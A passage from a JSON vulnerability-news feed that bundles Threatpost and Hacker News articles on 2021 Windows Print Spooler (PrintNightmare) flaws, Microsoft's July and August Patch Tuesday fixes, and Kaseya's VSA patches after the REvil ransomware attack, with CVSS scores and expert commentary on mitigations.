included all previous patches as well as protections for CVE-2021-1675 as well as a new fix for CVE-2021-34527.\n\nHowever, that fix also [was incomplete](<https://www.kb.cert.org/vuls/id/383432>), and Microsoft continues to work on further remediations as it also works to patch this latest bug, CVE-2021-34481. 
In the meantime, affected customers should install the most recent Microsoft updates as well as use the workaround to avoid exploitation, the company said.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-16T11:57:53", "type": "threatpost", "title": "Microsoft: Unpatched Bug in Windows Print Spooler", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34527"], "modified": "2021-07-16T11:57:53", "id": "THREATPOST:A8242348917526090B7A1B23735D5C6C", "href": "https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-13T19:49:18", "description": "One day after dropping its scheduled August Patch Tuesday update, Microsoft issued a warning about yet another unpatched privilege escalation/remote code-execution (RCE) vulnerability in the Windows Print Spooler that can be filed under the [PrintNightmare umbrella](<https://threatpost.com/cisa-mitigation-printnightmare-bug/167515/>).\n\nThe news comes amid plenty of PrintNightmare exploitation. Researchers from CrowdStrike warned in a [Wednesday report](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) that the operators of the Magniber ransomware quickly weaponized CVE-2021-34527 to attack users in South Korea, with attacks dating back to at least July 13. 
And Cisco Talos [said Thursday](<https://blog.talosintelligence.com/2021/08/vice-society-ransomware-printnightmare.html>) that the Vice Society gang was seen using CVE-2021-1675 and CVE-2021-34527 to spread laterally across a victim\u2019s network as part of a recent ransomware attack.\n\n\u201cIn technology, almost nothing ages gracefully,\u201d Chris Clements, vice president of solutions architecture and Cerberus security officer at Cerberus Sentinel, told Threatpost. \u201cThe Print Spooler in Windows is proving that rule. It\u2019s likely that the code has changed little in the past decades and likely still bears a striking resemblance to source code that was made public in previous Windows leaks. I\u2019ve heard it said that ransomware gangs might also be referred to as \u2018technical debt collectors,\u2019 which would be funnier if the people suffering most from these vulnerabilities weren\u2019t Microsoft\u2019s customers.\u201d\n\nThe fresh zero-day bug, tracked as CVE-2021-36958, carries a CVSS vulnerability-severity scale rating of 7.3, meaning that it\u2019s rated as \u201cimportant.\u201d Microsoft said that it allows for a local attack vector requiring user interaction, but that the attack complexity is low, with few privileges required.\n\n\u201cA remote code-execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\u201d the computing giant explained in its [Wednesday advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>). \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. 
An attacker could then install programs; view, change or delete data; or create new accounts with full user rights.\u201d\n\nThe CERT Coordination Center actually flagged the issue in mid-July, when it warned that a [working exploit](<https://twitter.com/gentilkiwi/status/1416429860566847490>) was available. That proof-of-concept (PoC), issued by Mimikatz creator Benjamin Delpy, comes complete with a video.\n\nOn Thursday, CERT/CC issued more details on the issue, explaining that it arises from an oversight in signature requirements around the \u201cPoint and Print\u201d capability, which allows users without administrative privileges to install printer drivers that execute with SYSTEM privileges via the Print Spooler service.\n\nWhile Microsoft requires that printer drivers installable via Point and Print are either signed by a WHQL release signature or by a trusted certificate, Windows printer drivers can specify queue-specific files that are associated with the use of the device, which leaves a loophole for malicious actors.\n\n\u201cFor example, a shared printer can specify a CopyFiles directive for arbitrary files,\u201d according to the CERT/CC [advisory](<https://www.kb.cert.org/vuls/id/131152>). \u201cThese files, which may be copied over alongside the digital-signature-enforced printer driver files, are not covered by any signature requirement. Furthermore, these files can be used to overwrite any of the signature-verified files that were placed on a system during printer driver install. 
This can allow for local privilege escalation to SYSTEM on a vulnerable system.\u201d\n\nMicrosoft credited Victor Mata of FusionX at Accenture Security with originally reporting the issue, which Mata said occurred back in December 2020:\n\n> Hey guys, I reported the vulnerability in Dec\u201920 but haven\u2019t disclosed details at MSRC\u2019s request. It looks like they acknowledged it today due to the recent events with print spooler.\n> \n> \u2014 Victor Mata (@offenseindepth) [August 11, 2021](<https://twitter.com/offenseindepth/status/1425574625384206339?ref_src=twsrc%5Etfw>)\n\nSo far, Microsoft hasn\u2019t seen any attacks in the wild using the bug, but it noted that exploitation is \u201cmore likely.\u201d With a working exploit in circulation, that seems a fair assessment.\n\n## **Print Spooler-Palooza and the PrintNightmare**\n\nDelpy characterized this latest zero-day as being part of the string of Print Spooler bugs collectively known as PrintNightmare.\n\nThe bad dream started in early July, when a PoC exploit for a bug tracked as CVE-2021-1675 was [dropped on GitHub](<https://threatpost.com/poc-exploit-windows-print-spooler-bug/167430/>). The flaw was originally addressed in [June\u2019s Patch Tuesday updates](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>) from Microsoft as a minor elevation-of-privilege vulnerability, but the PoC showed that it\u2019s actually a critical Windows security vulnerability that can be used for RCE. That prompted Microsoft to issue a different CVE number \u2013 in this case, CVE-2021-34527 \u2013 to designate the RCE variant, and it prompted [an emergency partial patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>), too.\n\n\u201cThis vulnerability is similar but distinct from the vulnerability that is assigned CVE-2021-1675, which addresses a different vulnerability in RpcAddPrinterDriverEx(),\u201d the company wrote in the advisory at the time. 
\u201cThe attack vector is different as well. CVE-2021-1675 was addressed by the June 2021 security update.\u201d\n\nBoth bugs \u2013 which are really just variants of a single issue \u2013 are collectively known as PrintNightmare. The PrintNightmare umbrella expanded a bit later in July, when yet another, [similar bug was disclosed](<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>), tracked as CVE-2021-34481. It remained unpatched until it was finally addressed with [an update](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>) issued alongside the [August Patch Tuesday updates](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>) (which itself detailed three additional Print Spooler vulnerabilities, one critical).\n\n## **How to Protect Systems from Print Spooler Attacks**\n\nAs mentioned, there\u2019s no patch yet for the bug, but users can protect themselves by simply stopping and disabling the Print Spooler service:\n\n[Image: stopping and disabling the Print Spooler service. Source: Microsoft.]\n\nCERT/CC also said that since public exploits for Print Spooler attacks use the SMB file-sharing service for remote connectivity to a malicious shared printer, blocking outbound connections to SMB resources would thwart some attacks by blocking malicious SMB printers that are hosted outside of the network.\n\n\u201cHowever, Microsoft indicates that printers can be shared via the Web Point-and-Print Protocol, which may allow installation of arbitrary printer drivers without relying on SMB traffic,\u201d according to CERT/CC. 
\u201cAlso, an attacker local to your network would be able to share a printer via SMB, which would be unaffected by any outbound SMB traffic rules.\u201d\n\nIn its update advisory for CVE-2021-34481, Microsoft also detailed how to amend the default Point and Print functionality, which prevents non-administrator users from installing or updating printer drivers remotely and which could help mitigate the latest zero-day.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T13:19:50", "type": "threatpost", "title": "Microsoft Warns: Another Unpatched PrintNightmare Zero-Day", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-08-12T13:19:50", "id": "THREATPOST:ADA9E95C8FD42722E783C74443148525", "href": "https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-11T19:56:07", "description": "Microsoft has patched 51 security vulnerabilities in its scheduled August Patch Tuesday update, including seven critical bugs, two issues that were publicly disclosed but unpatched until now, and one that\u2019s listed as a zero-day that has been exploited in the wild.\n\nOf note, there are 17 elevation-of-privilege (EoP) vulnerabilities, 13 remote code-execution (RCE) issues, eight information-disclosure flaws and two denial-of-service (DoS) bugs.\n\nThe update also includes patches for three more Print Spooler bugs, familiar from the PrintNightmare saga.\n\n\u201cFortunately, it was a lighter month than usual,\u201d said Eric Feldman, senior product marketing manager at Automox, in a [Patch Tuesday analysis](<https://blog.automox.com/automox-experts-weigh-in-august-patch-tuesday-2021>) from the vendor. \u201cThis represents a 56 percent reduction in overall vulnerabilities from July, and 33 percent fewer vulnerabilities on average for each month so far this year. 
We have also seen a similar reduction in critical vulnerabilities this month, with 30 percent less compared to the monthly average.\u201d\n\n## **Windows Critical Security Vulnerabilities**\n\nThe seven critical bugs [addressed in August](<https://msrc.microsoft.com/update-guide/>) are as follows:\n\n * CVE-2021-26424 \u2013 Windows TCP/IP RCE Vulnerability\n * CVE-2021-26432 \u2013 Windows Services for NFS ONCRPC XDR Driver RCE Vulnerability\n * CVE-2021-34480 \u2013 Scripting Engine Memory Corruption Vulnerability\n * CVE-2021-34530 \u2013 Windows Graphics Component RCE Vulnerability\n * CVE-2021-34534 \u2013 Windows MSHTML Platform RCE Vulnerability\n * CVE-2021-34535 \u2013 Remote Desktop Client RCE Vulnerability\n * CVE-2021-36936 \u2013 Windows Print Spooler RCE Vulnerability\n\nThe bug tracked as **CVE-2021-26424** exists in the TCP/IP protocol stack identified in Windows 7 and newer Microsoft operating systems, including servers.\n\n\u201cDespite its CVSS rating of 9.9, this may prove to be a trivial bug, but it\u2019s still fascinating,\u201d said Dustin Childs of Trend Micro\u2019s Zero Day Initiative (ZDI) in his [Tuesday analysis](<https://www.zerodayinitiative.com/blog/2021/8/10/the-august-2021-security-update-review>). \u201cAn attacker on a guest Hyper-V OS could execute code on the host Hyper-V server by sending a specially crafted IPv6 ping. This keeps it out of the wormable category. Still, a successful attack would allow the guest OS to completely take over the Hyper-V host. 
While not wormable, it\u2019s still cool to see new bugs in new scenarios being found in protocols that have been around for years.\u201d\n\nThe next bug, **CVE-2021-26432** in Windows Services, is more likely to be exploited given its low complexity status, according to Microsoft\u2019s advisory; it doesn\u2019t require privileges or user interaction to exploit, but Microsoft offered no further details.\n\n\u201cThis may fall into the \u2018wormable\u2019 category, at least between servers with NFS installed, especially since the open network computing remote procedure call (ONCRPC) consists of an External Data Representation (XDR) runtime built on the Winsock Kernel (WSK) interface,\u201d Childs said. \u201cThat certainly sounds like elevated code on a listening network service. Don\u2019t ignore this patch.\u201d\n\nAleks Haugom, product marketing manager at Automox, added, \u201cExploitation results in total loss of confidentiality across all devices managed by the same security authority. Furthermore, attackers can utilize it for denial-of-service attacks or to maliciously modify files. So far, no further details have been divulged by Microsoft or the security researcher (Liubenjin from Codesafe Team of Legendsec at Qi\u2019anxin Group) that discovered this vulnerability. Given the broad potential impact, its label \u2018Exploitation More Likely\u2019 and apparent secrecy, patching should be completed ASAP.\u201d\n\nMeanwhile, the memory-corruption bug (**CVE-2021-34480**) arises from how the scripting engine handles objects in memory, and it also allows RCE. Using a web-based attack or a malicious file, such as a malicious landing page or phishing email, attackers can use this vulnerability to take control of an affected system, install programs, view or change data, or create new user accounts with full user rights.\n\n\u201cCVE-2021-34480 should also be a priority,\u201d Kevin Breen, director of cyber-threat research at Immersive Labs, told Threatpost. 
\u201cIt is a low score in terms of CVSS, coming in at 6.8, but has been marked by Microsoft as \u2018Exploitation More Likely\u2019 because it is the type of attack commonly used to increase the success rate of spear phishing attacks to gain network access. Simple, but effective.\u201d\n\nThe Windows Graphic Component bug (**CVE-2021-34530**) allows attackers to remotely execute malicious code in the context of the current user, according to Microsoft \u2013 if they can social-engineer a target into opening a specially crafted file.\n\nAnother bug exists in the Windows MSHTML platform, also known as Trident (**CVE-2021-34534**). Trident is the rendering engine (mshtml.dll) used by Internet Explorer. The bug affects many Windows 10 versions (1607, 1809, 1909, 2004, 20H2, 21H1) as well as Windows Server 2016 and 2019.\n\nBut while it potentially affects a large number of users, exploitation is not trivial.\n\n\u201cTo exploit, a threat actor would need to pull off a highly complex attack with user interaction \u2013 still entirely possible with the sophisticated attackers of today,\u201d said Peter Pflaster, technical product marketing manager at Automox.\n\nThe bug tracked as **CVE-2021-34535** impacts the Microsoft Remote Desktop Client, Microsoft\u2019s nearly ubiquitous utility for connecting to remote PCs.\n\n\u201cWith today\u2019s highly dispersed workforce, CVE-2021-34535, an RCE vulnerability in Remote Desktop Clients, should be a priority patch,\u201d said Breen. \u201cAttackers increasingly use RDP access as the tip of the spear to gain network access, often combining it with privilege escalation to move laterally. 
These can be powerful as, depending on the method, it may allow the attacker to authenticate in the network in the same way a user would, making detection difficult.\u201d\n\nAccording to Childs, it\u2019s not as dangerous a bug [as BlueKeep](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>), which also affected RDP.\n\n\u201cBefore you start having flashbacks to BlueKeep, this bug affects the RDP client and not the RDP server,\u201d he said. \u201cHowever, the CVSS 9.9 bug is nothing to ignore. An attacker can take over a system if they can convince an affected RDP client to connect to an RDP server they control. On Hyper-V servers, a malicious program running in a guest VM could trigger guest-to-host RCE by exploiting this vulnerability in the Hyper-V Viewer. This is the more likely scenario and the reason you should test and deploy this patch quickly.\u201d\n\n## **Windows Print Spooler Bugs \u2013 Again**\n\nThe final critical bug is **CVE-2021-36936**, a Windows Print Spooler RCE bug that\u2019s listed as publicly known.\n\nPrint Spooler made headlines last month, when Microsoft patched what it thought was a minor elevation-of-privilege vulnerability in the service (CVE-2021-1675). But the listing was updated later in the week, after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE \u2013 [requiring a new patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>).\n\nMicrosoft also disclosed a second bug, similar to PrintNightmare (CVE-2021-34527); and a third, [an EoP issue](<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>) ([CVE-2021-34481](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>)).\n\n\u201cAnother month, another remote code-execution bug in the Print Spooler,\u201d said ZDI\u2019s Childs. 
\u201cThis bug is listed as publicly known, but it\u2019s not clear if this bug is a variant of PrintNightmare or a unique vulnerability all on its own. There are quite a few print-spooler bugs to keep track of. Either way, attackers can use this to execute code on affected systems. Microsoft does state low privileges are required, so that should put this in the non-wormable category, but you should still prioritize testing and deployment of this critical-rated bug.\u201d\n\nThe critical vulnerability is just one of three Print Spooler issues in the August Patch Tuesday release.\n\n\u201cThe specter of the PrintNightmare continues to haunt this patch Tuesday with three more print spooler vulnerabilities, CVE-2021-36947, CVE-2021-36936 and CVE-2021-34481,\u201d said Breen. \u201cAll three are listed as RCE over the network, requiring a low level of access, similar to PrintNightmare. Microsoft has marked these as \u2018Exploitation More Likely\u2019 which, if the previous speed of POC code being published is anything to go by, is certainly true.\u201d\n\n## **RCE Zero-Day in Windows Update Medic Service**\n\nThe actively exploited bug is tracked as **CVE-2021-36948** and is rated as important; it could pave the way for RCE via the Windows Update Medic Service in Windows 10 and Server 2019 and newer operating systems.\n\n\u201cUpdate Medic is a new service that allows users to repair Windows Update components from a damaged state such that the device can continue to receive updates,\u201d Automox\u2019s Jay Goodman explained. \u201cThe exploit is both low complexity and can be exploited without user interaction, making this an easy vulnerability to include in an adversary\u2019s toolbox.\u201d\n\nImmersive\u2019s Breen added, \u201cCVE-2021-36948 is a privilege-escalation vulnerability \u2013 the cornerstone of modern intrusions as they allow attackers the level of access to do things like hide their tracks and create user accounts. 
In the case of ransomware attacks, they have also been used to ensure maximum damage.\u201d\n\nThough Microsoft reports the bug as being exploited in the wild, activity appears to remain limited or targeted: \u201cWe have seen no evidence of it at Kenna Security at this time,\u201d Jerry Gamblin, director of security research at Kenna Security (now part of Cisco) told Threatpost.\n\n## **Publicly Known Windows LSA Spoofing Bug**\n\nThe second publicly known bug (after the Print Spooler issue covered earlier) is tracked as **CVE-2021-36942**, and it\u2019s an important-rated Windows LSA (Local Security Authority) spoofing vulnerability.\n\n\u201cIt fixes a flaw that could be used to steal NTLM hashes from a domain controller or other vulnerable host,\u201d Immersive\u2019s Breen said. \u201cThese types of attacks are well known for lateral movement and privilege escalation, as has been demonstrated recently by a [new exploit called PetitPotam](<https://threatpost.com/microsoft-petitpotam-poc/168163/>). It is a post-intrusion exploit \u2013 further down the attack chain \u2013 but still a useful tool for attackers.\u201d\n\nChilds offered a bit of context around the bug.\n\n\u201cMicrosoft released this patch to further protect against NTLM relay attacks by issuing this update to block the LSARPC interface,\u201d he said. \u201cThis will impact some systems, notably Windows Server 2008 SP2, that use the EFS API OpenEncryptedFileRawA function. You should apply this to your Domain Controllers first and follow the additional guidance in [ADV210003](<https://msrc.microsoft.com/update-guide/vulnerability/ADV210003>) and [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>). 
This has been an ongoing issue since 2009, and, likely, this isn\u2019t the last we\u2019ll hear of this persistent issue.\u201d\n\nMicrosoft\u2019s next Patch Tuesday will fall on September 14.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T21:17:58", "type": "threatpost", "title": "Actively Exploited Windows Zero-Day Gets a Patch", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-1675", "CVE-2021-26424", "CVE-2021-26432", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-34530", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-36936", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2021-08-10T21:17:58", "id": "THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "href": "https://threatpost.com/exploited-windows-zero-day-patch/168539/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-13T22:17:17", "description": "Three bugs under active exploit were squashed by Microsoft Tuesday, part of its [July security roundup](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jul>) of fixes for Windows, Microsoft Office, SharePoint Server and Exchange Server. In all, Microsoft patched 116 bugs. Twelve bugs are rated critical, 103 rated important and one classified as moderate in severity.\n\nBugs under active attack include a critical scripting engine memory corruption ([CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>)) flaw and two additional Windows kernel elevation-of-privilege vulnerabilities ([CVE-2021-31979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31979>), [CVE-2021-33771](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33771>)), both with a severity rating of important.\n\nThe hundred-plus bug fixes add to a rough July for Microsoft, which rolled out an out-of-band fix for a Windows print spooler remote-code-execution vulnerability ([CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>)), dubbed [PrintNightmare](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>), earlier this month. 
The nightmare bug, first disclosed in April, was later discovered to be more serious than initially thought.\n\n## **Public, But Not Exploited**\n\nFive of the bugs patched by Microsoft ([CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-33781](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33781>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>), [CVE-2021-33779](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33779>), [CVE-2021-34492](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34492>)) were publicly known, albeit not exploited. Only one of those bugs (CVE-2021-34473), a Microsoft Exchange Server remote code execution (RCE) vulnerability, has a severity rating of critical, with a CVSS score of 9.1. The bug, one of the highest rated in terms of importance to fix this month, was part of Microsoft\u2019s April Patch Tuesday roundup of fixes, according to commentary by [Cisco Talos](<https://blog.talosintelligence.com/2021/07/microsoft-patch-tuesday-for-july-2021.html>).\n\n\u201cThis vulnerability was already patched in Microsoft\u2019s April security update but was mistakenly not disclosed. Users who already installed the April 2021 update are already protected from this vulnerability, though it is worth noting that this issue was part of a series of zero-days in Exchange Server used in a wide-ranging APT attack,\u201d wrote Talos authors Jon Munshaw and Jaeson Schultz.\n\n## **Patching Priorities**\n\nThe most pressing of the bugs is a memory corruption vulnerability (CVE-2021-34448) in Windows Server\u2019s scripting engine that is triggered when the user opens a specially crafted file, either attached to an email or a compromised website.\n\n\u201c[This bug] is the most serious vulnerability for me. 
It is elegant in its simplicity, letting an attacker gain remote code execution just by getting the target to visit a domain,\u201d wrote Kevin Breen, director of cyber threat research with Immersive Labs, in his Patch Tuesday commentary. \u201cWith malicious, yet professional looking, domains carrying valid TLS certificates a regular feature nowadays, seamless compromise would be a trivial matter. Victims could even be attacked by sending .js or .hta files in targeted phishing emails.\u201d\n\nCisco Talos advises system admins to prioritize a patch for a critical bug ([CVE-2021-34464](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34464>)) in Microsoft\u2019s free Defender anti-virus software. \u201cThis issue could allow an attacker to execute remote code on the victim machine. However, users do not need to take any actions to resolve this issue, as the update will automatically install. The company has listed steps in its advisory users can take to ensure the update is properly installed,\u201d wrote Munshaw and Schultz.\n\nResearchers have also identified three SharePoint Server bugs ([CVE-2021-34520](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34520>), [CVE-2021-34467](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34467>), [CVE-2021-34468](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34468>)) as priority patches. Each allows an attacker to execute remote code on the victim machine. All are rated important. However, Microsoft reports that exploitation is \u201cmore likely\u201d with these vulnerabilities, Talos said.\n\nZero Day Initiative\u2019s Dustin Childs recommends tackling [CVE-2021-34458](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34458>), a Windows kernel vulnerability. \u201cIt\u2019s rare to see remote code execution in a kernel bug, but this is that rare exception. 
This bug impacts systems hosting virtual machines with single root input/output virtualization (SR-IOV) devices,\u201d [he wrote](<https://www.zerodayinitiative.com/blog/2021/7/13/the-july-2021-security-update-review>).\n\n\u201cIt\u2019s not clear how widespread this configuration is, but considering this bug rates as a CVSS 9.9, it\u2019s not one to ignore. If you have virtual machines in your environment, test and patch quickly,\u201d Childs added.\n\nIn related news, [Adobe\u2019s July patch roundup](<https://threatpost.com/adobe-patches-critical-acrobat/167743/>), also released Tuesday, includes fixes for its ubiquitous and free PDF reader Acrobat 2020 and other software such as Illustrator and Bridge. In all, Adobe patched 20 Acrobat bugs, with nine rated important.\n", "cvss3": {}, "published": "2021-07-13T21:26:27", "type": "threatpost", "title": "Microsoft Crushes 116 Bugs, Three Actively Exploited", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-31979", "CVE-2021-33771", "CVE-2021-33779", "CVE-2021-33781", "CVE-2021-34448", "CVE-2021-34458", "CVE-2021-34464", "CVE-2021-34467", "CVE-2021-34468", "CVE-2021-34473", "CVE-2021-34492", "CVE-2021-34520", "CVE-2021-34523", "CVE-2021-34527"], "modified": "2021-07-13T21:26:27", "id": "THREATPOST:98D815423018872E6E596DAA8131BF3F", "href": "https://threatpost.com/microsoft-crushes-116-bugs/167764/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:21", "description": "Florida-based software vendor Kaseya on Sunday rolled out urgent updates to address critical security vulnerabilities in 
its Virtual System Administrator (VSA) solution that was used as a jumping off point to target as many as 1,500 businesses across the globe as part of a widespread [supply-chain ransomware attack](<https://thehackernews.com/2021/07/kaseya-rules-out-supply-chain-attack.html>).\n\nFollowing the incident, the company had urged on-premises VSA customers to shut down their servers until a patch was available. Now, almost 10 days later the firm has shipped [VSA version 9.5.7a (9.5.7.2994)](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041>) with fixes for three new security flaws \u2014 \n\n * **CVE-2021-30116** \\- Credentials leak and business logic flaw\n * **CVE-2021-30119** \\- Cross-site scripting vulnerability\n * **CVE-2021-30120** \\- Two-factor authentication bypass\n\nThe security issues are part of a total of seven vulnerabilities that were discovered and reported to Kaseya by the Dutch Institute for Vulnerability Disclosure ([DIVD](<https://thehackernews.com/2021/07/revil-used-0-day-in-kaseya-ransomware.html>)) earlier in April, of which four other weaknesses were remediated in previous releases \u2014\n\n * **CVE-2021-30117** \\- SQL injection vulnerability (Fixed in VSA 9.5.6)\n * **CVE-2021-30118** \\- Remote code execution vulnerability (Fixed in VSA 9.5.5)\n * **CVE-2021-30121** \\- Local file inclusion vulnerability (Fixed in VSA 9.5.6)\n * **CVE-2021-30201** \\- XML external entity vulnerability (Fixed in VSA 9.5.6)\n\nBesides fixes for the aforementioned shortcomings, the latest version also resolves three other flaws, including a bug that exposed weak password hashes in certain API responses to brute-force attacks as well as a separate vulnerability that could allow the unauthorized upload of files to the VSA server.\n\nFor additional security, Kaseya is [recommending](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403869952657>) limiting access to the VSA Web GUI to local IP addresses by blocking port 443 inbound on the internet 
firewall for on-premises installations.\n\nKaseya is also warning its customers that installing the patch would force all users to mandatorily change their passwords post login to meet new password requirements, adding that select features have been replaced with improved alternatives and that the \"release introduces some functional defects that will be corrected in a future release.\"\n\nBesides the roll out of the patch for on-premises versions of its VSA remote monitoring and management software, the company has also instantiated the reinstatement of its VSA SaaS infrastructure. \"The restoration of services is progressing according to plan, with 60% of our SaaS customers live and servers coming online for the rest of our customers in the coming hours,\" Kaseya [said](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) in a rolling advisory.\n\nThe latest development comes days after Kaseya cautioned that spammers are capitalizing on the ongoing ransomware crisis to send out fake email notifications that appear to be Kaseya updates, only to infect customers with Cobalt Strike payloads to gain backdoor access to the systems and deliver next-stage malware.\n\nKaseya has said multiple flaws were chained together in what it called a \"sophisticated cyberattack\", and while it isn't exactly clear how it was executed, it's believed that a combination of CVE-2021-30116, CVE-2021-30119, and CVE-2021-30120 was used to carry out the intrusions. 
REvil, a prolific ransomware gang based in Russia, has claimed responsibility for the incident.\n\nThe use of trusted partners like software makers or service providers like Kaseya to identify and compromise new downstream victims, often called a supply-chain attack, and pair it with file-encrypting ransomware infections has also made it one of the largest and most significant such attacks to date.\n\nInterestingly, Bloomberg on Saturday reported that five former Kaseya employees had flagged the company about \"glaring\" security holes in its software between 2017 and 2020, but their concerns were brushed off.\n\n\"Among the most glaring problems was software underpinned by outdated code, the use of weak encryption and passwords in Kaseya's products and servers, a failure to adhere to basic cybersecurity practices such as regularly patching software and a focus on sales at the expense of other priorities,\" the report [said](<https://www.bloomberg.com/news/articles/2021-07-10/kaseya-failed-to-address-security-before-hack-ex-employees-say>).\n\nThe Kaseya attack marks the third time that ransomware affiliates have abused Kaseya products as a vector to deploy ransomware.\n\nIn [February 2019](<https://www.reddit.com/r/msp/comments/ani14t/local_msp_got_hacked_and_all_clients_cryptolocked/>), the Gandcrab ransomware cartel \u2014 which later [evolved into Sodinokibi and REvil](<https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/>) \u2014 leveraged a vulnerability in a Kaseya plugin for the ConnectWise Manage software to 